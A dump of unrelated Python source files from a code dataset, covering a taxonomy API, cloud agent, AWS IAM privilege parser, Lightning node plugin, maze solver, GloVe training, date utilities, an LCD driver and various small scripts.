prefer = taxonomy.merge_select(prefer)
if request:
current_flask_taxonomies.permissions.taxonomy_term_read.enforce(request=request,
taxonomy=taxonomy,
slug=slug)
if INCLUDE_DELETED in prefer:
status_cond = sqlalchemy.sql.true()
else:
status_cond = TaxonomyTerm.status == TermStatusEnum.alive
return_descendants = INCLUDE_DESCENDANTS in prefer
if return_descendants:
query = current_flask_taxonomies.descendants_or_self(
TermIdentification(taxonomy=code, slug=slug),
levels=prefer.options.get('levels', None),
status_cond=status_cond,
return_descendants_count=INCLUDE_DESCENDANTS_COUNT in prefer,
return_descendants_busy_count=INCLUDE_STATUS in prefer
)
else:
query = current_flask_taxonomies.filter_term(
TermIdentification(taxonomy=code, slug=slug),
status_cond=status_cond,
return_descendants_count=INCLUDE_DESCENDANTS_COUNT in prefer,
return_descendants_busy_count=INCLUDE_STATUS in prefer
)
if q:
query = current_flask_taxonomies.apply_term_query(query, q, code)
paginator = Paginator(
prefer,
query, page if return_descendants else None,
size if return_descendants else None,
json_converter=lambda data:
build_descendants(data, prefer, root_slug=None),
allow_empty=INCLUDE_SELF not in prefer, single_result=INCLUDE_SELF in prefer,
has_query=q is not None
)
return paginator
def taxonomy_term_to_json(term):
"""
Converts taxonomy term to default JSON. Use only if the term
has ancestors pre-populated, otherwise it is not an efficient
implementation - use the one from API instead.
:param term: term to serialize
:return: array of json terms
"""
ret = []
while term:
data = {
**(term.extra_data or {}),
'slug': term.slug,
'level': term.level + 1,
}
if term.obsoleted_by_id:
data['obsoleted_by'] = term.obsoleted_by.slug
data['links'] = {
'self': 'https://' + \
current_app.config['SERVER_NAME'] + \
current_app.config['FLASK_TAXONOMIES_URL_PREFIX'] + \
term.slug
}
ret.append(data)
term = term.parent
return ret
| StarcoderdataPython |
109992 | """
Copyright (c) 2010-2013, Contrail consortium.
All rights reserved.
Redistribution and use in source and binary forms,
with or without modification, are permitted provided
that the following conditions are met:
1. Redistributions of source code must retain the
above copyright notice, this list of conditions
and the following disclaimer.
2. Redistributions in binary form must reproduce
the above copyright notice, this list of
conditions and the following disclaimer in the
documentation and/or other materials provided
with the distribution.
3. Neither the name of the Contrail consortium nor the
names of its contributors may be used to endorse
or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
from subprocess import Popen
from conpaas.core.expose import expose
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.core.agent import BaseAgent
class BluePrintAgent(BaseAgent):
"""Agent class with the following exposed methods:
check_agent_process() -- GET
create_hub(my_ip) -- POST
create_node(my_ip, hub_ip) -- POST
"""
def __init__(self, config_parser, **kwargs):
"""Initialize BluePrint Agent.
'config_parser' represents the agent config file.
**kwargs holds anything that can't be sent in config_parser.
"""
BaseAgent.__init__(self, config_parser)
@expose('POST')
def create_node(self, kwargs):
self.logger.info('Node starting up')
self.state = 'ADAPTING'
self.my_ip_address = kwargs['my_ip']
#Do something on agent startup
self.state = 'RUNNING'
self.logger.info('Node started up')
return HttpJsonResponse()
@expose('GET')
def test(self, kwargs):
self.logger.info('Test method started')
self.state = 'ADAPTING'
msg = "hello kitty"
self.state = 'RUNNING'
self.logger.info('Test method ended')
return HttpJsonResponse({'msg': msg})
| StarcoderdataPython |
3380304 | import re
PRIVILEGED_STATEMENT_RULES = {
"\*:\*": "Full AWS Account Admin",
"^[A-Za-z0-9]+:\*$": "Full {service} Admin"
}
FIND_SERVICE_REGEX = "^([A-Za-z0-9]+)(?=:)"
RESOURCE_ARN_WITH_SERVICE_REGEX = "^arn:aws(-cn|):{service}:.+"
class PoliciesPermissionsParser(object):
def __init__(self, policies):
self.__policies = policies
self.__permissions = {}
self.__disallowed_permissions = {}
self.__allowed_permissions = {}
@staticmethod
def __push_resource_permission(permissions_dict, statement):
resources = statement.resources
for action in statement.actions:
action_service = re.findall(FIND_SERVICE_REGEX, action)
if len(action_service) > 0:
for resource in resources:
is_arn_service_resource = re.match(RESOURCE_ARN_WITH_SERVICE_REGEX.format(service=action_service[0]), resource)
if is_arn_service_resource or resource == "*":
if resource not in permissions_dict:
permissions_dict[resource] = []
permissions_dict[resource].append(action)
def is_action_disallowed(self, deny_statement_rules, action_permission_rule):
action_service_matches = re.findall(FIND_SERVICE_REGEX, action_permission_rule)
if len(action_service_matches) > 0:
action_service = action_service_matches[0]
# Not matching permissions like ec2:list* - It doesn't support
if action_service in deny_statement_rules and (action_permission_rule in deny_statement_rules[action_service]
or action_service+":*" in deny_statement_rules[action_service]):
return True
return False
def is_permission_allowed(self, permissions_name, permission_resource=None):
if permissions_name is str:
permissions_name = [permissions_name]
if permission_resource is None:
for permission_resource in self.__permissions.keys():
for permission_name in permissions_name:
if permission_name in self.__permissions[permission_resource]:
return True
else:
if permission_resource in self.__permissions:
for permission_name in permissions_name:
if permission_name in self.__permissions[permission_resource]:
return True
return False
def parse(self):
for policy_arn, attached_policy_statement in self.__policies.items():
for statement in attached_policy_statement:
if statement.effect == "Deny":
self.__push_resource_permission(self.__disallowed_permissions, statement)
elif statement.effect == "Allow":
# Goes to function which parse the permissions and the resources (Get a statement)
self.__push_resource_permission(self.__allowed_permissions, statement)
for resource, actions in self.__allowed_permissions.items():
for action in actions:
if not self.is_action_disallowed(self.__disallowed_permissions, action):
if resource in self.__permissions:
self.__permissions[resource].add(action)
else:
self.__permissions[resource] = set()
self.__permissions[resource].add(action)
def __statement_policy_privilege_parser(self, action_permission):
"""
The function takes a action permission as an input and returns in a string any high privileged permissions it has
"""
action_permission_overview = ""
for rule in PRIVILEGED_STATEMENT_RULES:
if re.search(rule, action_permission):
service = re.findall(FIND_SERVICE_REGEX, action_permission)
if len(service) > 0:
action_permission_overview = PRIVILEGED_STATEMENT_RULES[rule].format(service=service[0])
else:
action_permission_overview = PRIVILEGED_STATEMENT_RULES[rule].format(service=action_permission)
break
return action_permission_overview
def get_detailed_permissions_status(self):
permissions_status = ""
if 0 < len(self.__permissions.keys()):
permissions_status += "Allowed permissions\r\n"
for resource in self.__permissions.keys():
permissions_status += " {resource}:\r\n".format(resource=resource)
for action_permission in self.__permissions[resource]:
permissions_status += " {action_permission}\n".format(action_permission=action_permission)
if 0 < len(self.__disallowed_permissions):
permissions_status += "Disallowed permissions:\r\n"
for resource in self.__disallowed_permissions:
permissions_status += " {resource}:\r\n".format(resource=resource)
for permission in self.__disallowed_permissions[resource]:
permissions_status += " {permission}\n".format(permission=permission)
return permissions_status
def get_permissions_status(self):
permissions_status = set()
for resource in self.__permissions.keys():
for action_permission in self.__permissions[resource]:
policy_privilege_parser = self.__statement_policy_privilege_parser(action_permission)
if policy_privilege_parser != "":
permissions_status.add(policy_privilege_parser)
return ", ".join(permissions_status) | StarcoderdataPython |
156004 | <reponame>adi2011/plugins
#! /usr/bin/python3
import py_compile
from pyln.client import Plugin
import pyqrcode
from requests import get
plugin = Plugin()
def getChannel(peerid, chanid):
peer = plugin.rpc.listpeers(peerid)
assert peer, "cannot find peer"
chan = peer["channels"]
assert chan["channel_id"]==chanid, "cannot find channel"
return {peer, chan}
@plugin.method("enable-spark")
def enable_spark(port = 9735):
token = plugin.rpc.call("commando-rune")
node_id = plugin.rpc.getinfo()["id"]
addr = get('https://api.ipify.org').content.decode('utf8')+":"+str(port)
res = "lnlink:" + node_id + '@' + addr + '?' + 'token=' + token["rune"]
qr = pyqrcode.create(res, encoding="ascii")
qr.show()
return res
@plugin.method("_listpays")
def listpays():
plugin.log("listpays")
return plugin.rpc.listpays()
#-----FOLLOWING ARE NOT NEEDED??----
# @plugin.method("spark-listpeers")
# def spark_listpeers():
# plugin.log("listpeers")
# return plugin.rpc.listpeers()
# @plugin.method("spark-getinfo")
# def spark_getinfo():
# plugin.log("getinfo")
# return plugin.rpc.getinfo()
# @plugin.method("spark-offer")
# def spark_offer(amount, discription):
# plugin.log("offer")
# return plugin.rpc.offer(amount, discription)
# @plugin.method("spark-listfunds")
# def spark_listfunds():
# plugin.log("listfunds")
# return plugin.rpc.listfunds()
# @plugin.method("spark-invoice")
# def spark_invoice(amt, label, disc):
# plugin.log("invoice")
# return plugin.rpc.invoice(amt, label, disc)
# @plugin.method("spark-newaddr")
# def spark_invoice():
# plugin.log("newaddr")
# return plugin.rpc.newaddr()
# @plugin.method("spark-getlog")
# def spark_invoice():
# plugin.log("getlog")
# return plugin.rpc.getlog()
# --------------------
@plugin.method("_listconfigs")
def listconfigs():
plugin.log("listconfigs")
return plugin.rpc.listconfigs()
@plugin.method("_listinvoices")
def listconfigs(plugin):
plugin.log("listinvoices")
temp = plugin.rpc.listinvoices()["invoices"]
res = []
for i in temp:
if i["status"]=="paid":
res.append(i)
return res
@plugin.method("_pay")
def pay(paystr, *args):
pay_res = plugin.rpc.pay(paystr, args)
return pay_res
@plugin.method("_decodecheck")
def decodecheck(paystr):
plugin.log("decodecheck")
s = plugin.rpc.decode(paystr)
if(s["type"]=="bolt12 offer"):
assert "recurrence" in s.keys(), "Offers with recurrence are unsupported"
assert s["quantity_min"] == None or s["msatoshi"] or s["amount"], 'Offers with quantity but no payment amount are unsupported'
assert not s["send_invoice"] or s["msatoshi"], "send_invoice offers with no amount are unsupported"
assert not s["send_invoice"] or s["min_quantity"] == None, 'send_invoice offers with quantity are unsupported'
return s
@plugin.method("_connectfund")
def connectfund(peeruri, satoshi, feerate):
peerid = peeruri.split('@')[0]
plugin.rpc.connect(peerid)
res = plugin.rpc.fundchannel(peerid, satoshi, feerate)
assert (res and res["channel_id"]), "cannot open channel"
return getChannel(peerid, res["channel_id"])
plugin.method("_close")
def close(peerid, chainid, force, timeout):
res = plugin.rpc.close(peerid, timeout)
assert res and res["txid"], "Cannot close channel"
peer, chan = getChannel(peerid, res["channel_id"])
return {peer, chan, res}
@plugin.init()
def init(options, configuration, plugin):
plugin.log("Plugin spark-commando initialized")
plugin.run() | StarcoderdataPython |
3361704 | <gh_stars>0
import unittest
import sys
import os
from os import system
from time import time
from pathlib import Path
from unittest.mock import patch
from self import test_self_compilation
from lib.runner import execute, TimeoutException, set_home_path
from tests.utils import CaptureOutput, for_all_test_results
class TestExecutionTimeout(unittest.TestCase):
def setUp(self):
os.chdir('..')
def tearDown(self):
os.chdir('grader')
@classmethod
def setUpClass(self):
system('cd .. && make selfie >/dev/null 2>&1')
def test_timeout(self):
start = time()
self.assertRaises(TimeoutException, execute,
'./selfie -c grader/tests/sleep-forever.c -m 10', 3)
self.assertLess(time() - start, 4)
def execute_mock(self, command, timeout=10):
return execute(command, timeout=0)
def check_output(self, result, msg):
self.assertFalse(result)
@patch('lib.runner.execute')
def test_result_of_timed_out_test(self, mock):
mock.side_effect = self.execute_mock
set_home_path(Path('..'))
with CaptureOutput() as capture:
test_self_compilation()
output = capture.get_output()
for_all_test_results(output, self.check_output)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1775162 | <reponame>Ostap2003/backtracking-team-project<gh_stars>0
import turtle
from stack import Stack
from pprint import pprint
class PathFinder:
"""Find path in a maze"""
PATH = "o"
WALL = "*"
USED = "-"
def __init__(self, start: tuple, finish: tuple, maze=None, path=None, draw_maze=False):
self.start_pos = start
self.exit = finish
self.draw_maze = draw_maze
if maze:
self.maze = maze
self.maze_rows = len(maze)
self.maze_cols = (len(maze[0]))
else:
self.maze_rows = 0
self.maze_cols = 0
self.maze = self.read_maze(path)
if self.draw_maze:
self.my_pen = turtle.Turtle()
self.my_pen._tracer(0)
self.my_pen.speed(1)
self.my_pen.hideturtle()
def read_maze(self, path):
"""Reads file with maze, and trasforms it into a list of lists"""
maze = []
with open(path, 'r', encoding='utf-8') as maze_fl:
for line in maze_fl:
self.maze_rows += 1
line = line.strip()
row = []
for el in line:
row.append(el)
maze.append(row)
self.maze_cols = len(maze[0])
return maze
def find_path(self):
"""Find a route that connects entrance to the maze
with the exit, if there is exit.
Makes moves in the following order:
up, right, left, down"""
moves_stack = Stack()
current_pos = self.start_pos
moves_stack.add(current_pos)
self.set_cell(current_pos, self.PATH)
possible_routes = [(-1, 0), (0, 1), (0, -1), (1, 0)]
while (not self._exit_found(current_pos)):
next_move_found = False
for move in possible_routes:
if self._valid_move(current_pos, move):
current_pos = current_pos[0] + move[0], current_pos[1] + move[1]
self.set_cell(current_pos, self.PATH)
moves_stack.add(current_pos)
next_move_found = True
# draw here a cell with turtle
if self.draw_maze:
self.my_pen.clear()
self.build_maze()
self.my_pen.getscreen().update()
break
if not next_move_found:
moves_stack.pop_el_from_stack()
self.set_cell(current_pos, self.USED)
# mark curr cell with grey col
if self.draw_maze:
self.my_pen.clear()
self.build_maze()
self.my_pen.getscreen().update()
current_pos = moves_stack.peek()
if self.draw_maze:
self.my_pen.getscreen().update()
turtle.done()
def _exit_found(self, current_pos):
"""Check if current position equals to the exit position"""
return self.exit == current_pos
def _valid_move(self, current_pos, move):
"""Check if move is valid"""
possible_mv = current_pos[0] + move[0], current_pos[1] + move[1]
# check if possible move is in board range
if possible_mv[0] in range(0, self.maze_rows) and\
possible_mv[1] in range(0, self.maze_cols):
cell_val = self.get_cell(possible_mv)
if cell_val == " ":
return True
return False
def get_cell(self, position):
"""Return value that belongs to the cell"""
return self.maze[position[0]][position[1]]
def set_cell(self, position: tuple, value: str):
"""Set a value for cell on the given position"""
self.maze[position[0]][position[1]] = value
def __str__(self):
"""String representation of the maze"""
maze = ""
for row in self.maze:
for el in row:
maze += el
maze += "\n"
return maze.strip()
def box(self, side):
"""Builds a box, an element of the maze that can be a wall, path, or unvisited cell"""
self.my_pen.begin_fill()
for _ in range(3):
self.my_pen.forward(side)
self.my_pen.left(90)
self.my_pen.forward(side)
self.my_pen.end_fill()
self.my_pen.setheading(0)
def build_maze(self):
"""Builds a whole maze using box func as a helper"""
side = 30
self.my_pen.penup()
self.my_pen.goto(-130,130)
self.my_pen.setheading(0)
for row in self.maze:
for col in row:
if col == "*":
self.my_pen.color("#000000")
elif col == "o":
self.my_pen.color("#4fff98")
elif col == "-":
self.my_pen.color("#ff7e4f")
else:
self.my_pen.color("#FFFFFF")
self.box(side)
self.my_pen.penup()
self.my_pen.forward(side)
self.my_pen.pendown()
self.my_pen.penup()
self.my_pen.setheading(270)
self.my_pen.forward(side)
self.my_pen.setheading(180)
self.my_pen.forward(side * self.maze_cols)
self.my_pen.setheading(0)
self.my_pen.pendown()
if __name__ == '__main__':
p = PathFinder((4, 1), (4, 3), path="path_finder/mazes/maze.txt", draw_maze=True)
p = PathFinder((0,1), (11, 7), path="path_finder/mazes/maze2.txt", draw_maze=True)
p = PathFinder((0, 1), (15, 14), path="path_finder/mazes/maze3.txt", draw_maze=True)
p.find_path()
print(p)
| StarcoderdataPython |
1796423 | <reponame>stevedya/wagtail<gh_stars>1-10
from wagtail.test.dummy_external_storage import * # noqa
| StarcoderdataPython |
3237223 | '''
Author: jianzhnie
Date: 2022-01-05 16:21:54
LastEditTime: 2022-03-07 16:16:06
LastEditors: jianzhnie
Description:
'''
import sys
import torch
import torch.optim as optim
from tqdm.auto import tqdm
from nlptoolkit.data.utils.utils import (get_loader, load_reuters,
save_pretrained)
from nlptoolkit.datasets.nlmdataset import GloveDataset
from nlptoolkit.models.lm.glove import GloveModel
sys.path.append('../../')
if __name__ == '__main__':
embedding_dim = 64
context_size = 2
batch_size = 1024
num_epoch = 10
# 用以控制样本权重的超参数
m_max = 100
alpha = 0.75
# 从文本数据中构建GloVe训练数据集
corpus, vocab = load_reuters()
dataset = GloveDataset(corpus, vocab, context_size=context_size)
data_loader = get_loader(dataset, batch_size)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = GloveModel(len(vocab), embedding_dim)
model.to(device)
optimizer = optim.Adam(model.parameters(), lr=0.001)
model.train()
for epoch in range(num_epoch):
total_loss = 0
for batch in tqdm(data_loader, desc=f'Training Epoch {epoch}'):
# words, contexts, counts 的 shape : batch_size * 1
words, contexts, counts = [x.to(device) for x in batch]
# 提取batch内词、上下文的向量表示及偏置
# word_embeds: Batch_size * Embedding_dim
# word_biases: Batch_size * 1
word_embeds, word_biases = model.forward_w(words)
# context_embeds: Batch_size * Embedding_dim
# context_biases: Batch_size * 1
context_embeds, context_biases = model.forward_c(contexts)
# 回归目标值:必要时可以使用log(counts+1)进行平滑
log_counts = torch.log(counts)
# 样本权重
weight_factor = torch.clamp(torch.pow(counts / m_max, alpha),
max=1.0)
optimizer.zero_grad()
# 计算batch内每个样本的L2损失
loss = (torch.sum(word_embeds * context_embeds, dim=1) +
word_biases + context_biases - log_counts)**2
# 样本加权损失
wavg_loss = (weight_factor * loss).mean()
wavg_loss.backward()
optimizer.step()
total_loss += wavg_loss.item()
print(f'Loss: {total_loss:.2f}')
# 合并词嵌入矩阵与上下文嵌入矩阵,作为最终的预训练词向量
combined_embeds = model.w_embeddings.weight + model.c_embeddings.weight
save_pretrained(vocab, combined_embeds.data, 'glove.vec')
| StarcoderdataPython |
1692386 |
import re
from datetime import date as datetime_date
from .add_time import add_months, add_days
from calendar import day_name, day_abbr
from .YearMonth import YearMonth
from .YearQuarter import YearQuarter
from .to_quarter import get_quarter
from .remove_non_alphanumeric import remove_non_alphanumeric
def to_monthname(date, abr = False):
try:
result = date.strftime('%B')
except:
print('date:', date, type(date))
raise ValueError('oops')
if abr:
return result[:3]
else:
return result
def to_weekday(date):
return date.weekday()
def to_weekdayname(date, abr=False):
weekday = to_weekday(date)
if abr:
return day_abbr[weekday]
else:
return day_name[weekday]
def to_date_part(date, date_part, sep ='-', abr = False):
date_part = date_part.lower()
date_part = remove_non_alphanumeric(s = date_part, replace_with = '', keep_underscore = False)
if date_part == 'day': return date.day
elif date_part == 'month': return date.month
elif date_part == 'monthname': return to_monthname(date=date, abr=abr)
elif date_part == 'quarter': return get_quarter(date=date)
elif date_part == 'yearmonth': return YearMonth(date=date, sep=sep)
elif date_part == 'yearmonthabr': return YearMonth(date=date, sep=sep, month_as='abr')
elif date_part == 'yearmonthname': return YearMonth(date=date, sep=sep, month_as='name')
elif date_part == 'yearquarter': return YearQuarter(date=date, sep=sep)
elif date_part == 'monthname': return to_monthname(date = date, abr = abr)
elif date_part == 'weekday': return to_weekday(date)
elif date_part == 'weekdayname': return to_weekdayname(date=date, abr=abr)
else: return date.year
def yearmonth_to_date(x, day = 1):
if type(x) is int:
year = x // 100
month = x % 100
elif type(x) is str:
x = str(x)
year = int(re.findall(pattern = '^\d+', string = x)[0][:4])
month = int(re.findall(pattern = '\d+$', string = x)[0][-2:])
elif type(x) is YearMonth:
year = x.year.value
month = x.month.value
else:
return None
try:
result = datetime_date(year = year, month = month, day = day)
except:
# There is an exception if the day of the month we're in does not exist in the target month
# Go to the FIRST of the month AFTER, then go back one day.
first_day_of_the_month = datetime_date(year = year, month = month, day = 1)
first_day_of_next_month = add_months(date = first_day_of_the_month, months = 1)
last_day_of_the_month = add_days(date = first_day_of_next_month, days = -1)
result = last_day_of_the_month
return result
| StarcoderdataPython |
1692448 | #!/usr/bin/python
#import
import RPi.GPIO as GPIO
import rasiberryPiGPIOBaseController.Pin as Pin
import time
# Define GPIO to LCD mapping
LCD_RS = 23
LCD_E = 24
LCD_D4 = 25
LCD_D5 = 1
LCD_D6 = 12
LCD_D7 = 16
# Define some device constants
LCD_WIDTH = 16 # Maximum characters per line
LCD_CHR = Pin.PIN_HIGH
LCD_CMD = Pin.PIN_LOW
LCD_LINE_1 = 0x80 # LCD RAM address for the 1st line
LCD_LINE_2 = 0xC0 # LCD RAM address for the 2nd line
LED_CMD_NEWCHAR = 0x40 # LCD RAM address CGRAM (customer defined character)
# Timing constants
E_PULSE = 0.0005
E_DELAY = 0.0005
class LCD1602:
def __init__(self, rsPin, enablePin, D4Pin, D5Pin, D6Pin, D7Pin):
self._newCharacters = {}
self._rsPin = rsPin
self._enablePin = enablePin
self._D4Pin = D4Pin
self._D5Pin = D5Pin
self._D6Pin = D6Pin
self._D7Pin = D7Pin
# initial all output pins
self._rsPin.setupOutput() # RS
self._enablePin.setupOutput() # E
self._D4Pin.setupOutput() # DB4
self._D4Pin.setupOutput() # DB5
self._D4Pin.setupOutput() # DB6
self._D4Pin.setupOutput() # DB7
self.lcd_init()
# initial LCD functions
def lcd_init(self):
# Initialise display
self.lcd_send_byte(0x33, LCD_CMD) # 110011 Initialise
self.lcd_send_byte(0x32, LCD_CMD) # 110010 Initialise
self.lcd_send_byte(0x06, LCD_CMD) # 000110 Cursor move direction
self.lcd_send_byte(0x0C, LCD_CMD) # 001100 Display On,Cursor Off, Blink Off
self.lcd_send_byte(0x28, LCD_CMD) # 101000 Data length, number of lines, font size
self.lcd_send_byte(0x01, LCD_CMD) # 000001 Clear display
time.sleep(E_DELAY)
def lcd_send_byte(self, bits, mode):
# Send byte to data pins
# bits = data
# mode = PIN_LOW for character
# PIN_HIGH for command
self._rsPin.output_setup(mode) # RS
# High bits
self._D4Pin.output_setup(Pin.PIN_LOW)
self._D5Pin.output_setup(Pin.PIN_LOW)
self._D6Pin.output_setup(Pin.PIN_LOW)
self._D7Pin.output_setup(Pin.PIN_LOW)
if bits&0x10==0x10:
self._D4Pin.output_setup(Pin.PIN_HIGH)
if bits&0x20==0x20:
self._D5Pin.output_setup(Pin.PIN_HIGH)
if bits&0x40==0x40:
self._D6Pin.output_setup(Pin.PIN_HIGH)
if bits&0x80==0x80:
self._D7Pin.output_setup(Pin.PIN_HIGH)
# Toggle 'Enable' pin
self.lcd_toggle_enable()
# Low bits
self._D4Pin.output_setup(Pin.PIN_LOW)
self._D5Pin.output_setup(Pin.PIN_LOW)
self._D6Pin.output_setup(Pin.PIN_LOW)
self._D7Pin.output_setup(Pin.PIN_LOW)
if bits&0x01==0x01:
self._D4Pin.output_setup(Pin.PIN_HIGH)
if bits&0x02==0x02:
self._D5Pin.output_setup(Pin.PIN_HIGH)
if bits&0x04==0x04:
self._D6Pin.output_setup(Pin.PIN_HIGH)
if bits&0x08==0x08:
self._D7Pin.output_setup(Pin.PIN_HIGH)
# Toggle 'Enable' pin
self.lcd_toggle_enable()
# toggle enable pin to accept high or low value of the data
def lcd_toggle_enable(self):
# Toggle enable
time.sleep(E_DELAY)
self._enablePin.output_setup(Pin.PIN_HIGH)
time.sleep(E_PULSE)
self._enablePin.output_setup(Pin.PIN_LOW)
time.sleep(E_DELAY)
def convertToHEXForChar(self, charList):
convertedCharList = []
for message in charList:
convertedCharList.append(ord(message))
return convertedCharList
def displayChar(self, line, *args):
concatedList = []
for argItem in args:
concatedList.extend(argItem)
self.lcd_send_byte(line, LCD_CMD)
i = 0
for message in concatedList:
if(i >= 16):
break
self.lcd_send_byte(message, LCD_CHR)
def displayCharFromPosition(self, line, position, *args):
concatedList = []
for argItem in args:
concatedList.extend(argItem)
self.lcd_send_byte(line + (0x01 * position), LCD_CMD)
i = 0
for message in concatedList:
if(i >= (16 - position)):
break
self.lcd_send_byte(message, LCD_CHR)
def createNewCharacterInOnce(self, bitsList):
# prepare character hex list
allHexList = []
i = 0
for key in bitsList:
oneCharacterHex = bitsList[key]
allHexList.extend(oneCharacterHex)
self._newCharacters[key] = i
i += 1
# define start address for new character
self.lcd_send_byte(LED_CMD_NEWCHAR, LCD_CMD)
i = 0
for bits in allHexList:
self.lcd_send_byte(bits, LCD_CHR)
i += 1
def getNewCharacter(self, name):
newCharHex = 0x00 + self._newCharacters[name]
if newCharHex is None:
newCharHex = 0x00
return newCharHex
def simpleDemo(self):
newCharacter1 = [0x04, 0x06, 0x04, 0x06, 0x04, 0x04, 0x0e, 0x0e]
newCharacter2 = [0x04, 0x08, 0x0a, 0x12, 0x11, 0x11, 0x0a, 0x04]
allCharacters = {
"temperature": newCharacter1,
"pressure": newCharacter2
}
self.createNewCharacterInOnce(allCharacters)
self.displayChar(LCD_LINE_1, [self.getNewCharacter("temperature")], self.convertToHEXForChar(" simple demo"))
self.displayChar(LCD_LINE_2, [self.getNewCharacter("pressure")], self.convertToHEXForChar(" for LCD1602"))
time.sleep(3)
while True:
self.displayCharFromPosition(LCD_LINE_1, 10, self.convertToHEXForChar("10"))
self.displayCharFromPosition(LCD_LINE_2, 10, self.convertToHEXForChar("50%"))
time.sleep(3)
self.displayCharFromPosition(LCD_LINE_1, 10, self.convertToHEXForChar("25"))
self.displayCharFromPosition(LCD_LINE_2, 10, self.convertToHEXForChar("90%"))
time.sleep(3)
self.displayChar(LCD_LINE_1, self.convertToHEXForChar("simple demo end"))
self.displayChar(LCD_LINE_2, self.convertToHEXForChar("simple demo end"))
time.sleep(3)
self.displayChar(LCD_LINE_1, [self.getNewCharacter("temperature"), 0x02], self.convertToHEXForChar(" simple demo"))
self.displayChar(LCD_LINE_2, [self.getNewCharacter("pressure"), 0x03], self.convertToHEXForChar(" for LCD1602"))
time.sleep(3)
| StarcoderdataPython |
139104 | <filename>ooi_harvester/metadata/cli.py<gh_stars>1-10
import datetime
import typer
from . import create_metadata
app = typer.Typer()
@app.command()
def create(
s3_bucket: str = "ooi-metadata",
axiom: bool = False,
global_ranges: bool = False,
cava_assets: bool = False,
ooinet_inventory: bool = False,
ooi_streams: bool = False,
instrument_catalog: bool = False,
legacy_catalog: bool = False,
):
typer.echo("Metadata creation/refresh started.")
start_time = datetime.datetime.utcnow()
create_metadata(
s3_bucket,
axiom_refresh=axiom,
global_ranges_refresh=global_ranges,
cava_assets_refresh=cava_assets,
ooinet_inventory_refresh=ooinet_inventory,
ooi_streams_refresh=ooi_streams,
instrument_catalog_refresh=instrument_catalog,
legacy_inst_catalog_refresh=legacy_catalog,
)
time_elapsed = datetime.datetime.utcnow() - start_time
typer.echo(
f"Metadata creation/refresh finished. Process took {str(time_elapsed)}"
)
if __name__ == "__main__":
app()
| StarcoderdataPython |
160068 | from guizero import App, Text
a = App()
a.font = "courier new"
t1 = Text(a)
t1.value = "{}, {}, {}".format(t1.font, t1.text_size, t1.text_color)
t2 = Text(a, font="arial")
t2.value = "{}, {}, {}".format(t2.font, t2.text_size, t2.text_color)
t3 = Text(a, color="red", size=8, font="verdana")
t3.value = "{}, {}, {}".format(t3.font, t3.text_size, t3.text_color)
a.display() | StarcoderdataPython |
3205999 | from enum import Enum as BaseEnum
from .packing import pack_int64
from .deserialization import deserialize_int64
from .exceptions import DeserializationError
class Enum(BaseEnum):
"""Enumeration.
"""
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
def pack(self, stream):
"""Pack.
:param stream: Stream to pack the type to.
"""
stream.write(pack_int64(self.value))
@classmethod
def deserialize(cls, ser):
"""Deserialize.
:raises entangle.DeserializationError:
if the serialized input could not be deserialized.
"""
int_value = deserialize_int64(ser)
try:
return cls(int_value)
except ValueError:
raise DeserializationError('%r is not a valid %s value' %
(int_value, cls.__name__))
| StarcoderdataPython |
1640269 | import json
def get_report_type(report_type, date_range, rsid):
if report_type == 'core_metrics':
report = get_core_metrics_report_type(date_range)
elif report_type == 'emea_metrics':
report = get_country_metrics_report_type(date_range, rsid)
else:
print("You need to provide an Adobe report type like 'revenue' or 'conversion_rate.")
report = None
return report
# ToDo: Refactor hard coded paths.
def get_core_metrics_report_type(date_range):
# Load the report into a dict to easily change the date range.
with open("./dg_adobe/adobe_analytics_metrics_by_day.json", "r") as content:
adobe_analytics_report_json_dict = json.load(content)
# Set the adobe date in the dictionary.
adobe_analytics_report_json_dict["globalFilters"][3]["dateRange"] = date_range
report_request = json.dumps(adobe_analytics_report_json_dict)
return report_request
def get_country_metrics_report_type(date_range, rsid):
# Load the report into a dict to easily change the date range.
with open("./dg_adobe/adobe_analytics_metrics_by_day_rsid.json", "r") as content:
adobe_analytics_report_json_dict = json.load(content)
# Set the adobe date in the dictionary.
adobe_analytics_report_json_dict["globalFilters"][4]["dateRange"] = date_range
adobe_analytics_report_json_dict["rsid"] = rsid
report_request = json.dumps(adobe_analytics_report_json_dict)
return report_request
| StarcoderdataPython |
26830 | <filename>evaluation/dwf_power.py
from ctypes import *
from dwfconstants import *
dwf = cdll.LoadLibrary("libdwf.so")
hdwf = c_int()
dwf.FDwfParamSet(DwfParamOnClose, c_int(0)) # 0 = run, 1 = stop, 2 = shutdown
print("Opening first device")
dwf.FDwfDeviceOpen(c_int(-1), byref(hdwf))
if hdwf.value == hdwfNone.value:
print("failed to open device")
quit()
print(f'{hdwf=}')
dwf.FDwfDeviceAutoConfigureSet(hdwf, c_int(0))
# set up analog IO channel nodes
# enable positive supply
dwf.FDwfAnalogIOChannelNodeSet(hdwf, c_int(0), c_int(0), c_double(True))
# set voltage to 1.2 V
